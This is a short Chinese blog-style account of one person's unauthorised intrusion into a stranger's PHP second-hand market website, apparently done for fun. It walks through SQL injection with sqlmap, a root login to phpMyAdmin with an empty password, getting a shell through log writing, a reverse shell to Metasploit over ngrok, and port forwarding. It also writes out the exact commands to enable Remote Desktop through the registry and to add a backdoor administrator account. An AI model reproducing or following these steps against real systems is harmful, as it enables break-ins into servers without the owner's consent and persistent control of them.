我谁都不怕,就怕自己不够强大
QQ空间发现别人用PHP自己写了一个二手市场的网站
然后我闲的无聊,就有了本次渗透
测了一下,输入单引号
MySQL数据库直接报错
给师傅看了一下,确实是存在注入的
然后师傅干活去了,叫我自己整
但是我拉网线,也没有时间,就只能下班回去看吧
下班回去之后发现网站打不开了
然后..
继续。
抓个POST包,然后丢sqlmap里面跑
sql报错看到网站路径是在wamp文件夹下面的,网站应该存在phpmyadmin
然后sqlmap跑mysql表下面的user列,但是在user列里面没有找到password字段
完了我就把user列里面的数据全部dump
发现NULL
然后就直接用户名:root 密码空 登陆phpmyadmin
然后利用日志拿到shell –> https://www.cnblogs.com/xishaonian/p/6622818.html
虚拟终端执行whoami,直接是system权限 (一般用集成环境软件搭建的权限都比较大)
看一下ipconfig,是内网
然后本来想用Proxifier+reGeorg内网穿透搞这个内网的,但是我电脑没有环境
然后久哥哥教我用kali里面内嵌的portfwd工具进行端口转发
现在kali里面配置好ngrok,反弹shell过来
然后msf上面配置
然后反弹过来,msf上线
再使用portfwd端口转发 –> https://blog.csdn.net/ws13129/article/details/94395905?utm_source=app
-r 填目标内网IP
然后我们连接kali的33333端口就是连接的目标站的3389端口
连接试试
提示内部错误。。
久哥说是不是没开3389啊,然后我看了一下,,好像确实没开
使用cmd开启3389 –> https://www.cnblogs.com/dsli/p/7452535.html
开启:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
然后我们再连接
OK,成功
然后我们再添加一个账号进去
net user xb xb123.a /add 添加一个用户为xb,密码为xb123.a
net localgroup administrators xb /add 把用户xb提升到administrators管理员组
登陆服务器
感谢久哥,感谢师傅,感谢NU1l